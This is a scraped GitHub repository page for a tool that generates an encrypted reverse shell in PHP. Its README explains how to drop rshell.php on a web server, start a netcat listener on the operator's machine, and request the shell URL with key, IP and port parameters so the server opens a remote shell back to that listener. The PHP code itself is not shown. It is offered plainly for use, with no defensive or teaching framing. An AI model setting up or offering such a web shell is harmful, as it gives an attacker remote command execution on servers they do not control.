Skip to content

generates an encrypted reverse tcp tunnel implementation in php

Notifications You must be signed in to change notification settings

slattman/php-reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 

Repository files navigation

php-reverse-shell

Generates an encrypted reverse shell implementation in PHP

install: copy rshell.php to your server

run

http://localhost/rshell/rshell.php

on your client machine run

win32: nc -l -p PORT -vvv

http://joncraton.org/files/nc111nt.zip

else: netcat -l -p PORT -vvv

http://internap.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz

then query a connect...

http://localhost/rshell/SHELLNAME.php?key=KEY&ip=YOURIP&port=PORT

after the tunnel is created and the shell deamon is spawned close the browser window.

thats pretty much it...

About

generates an encrypted reverse tcp tunnel implementation in php

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages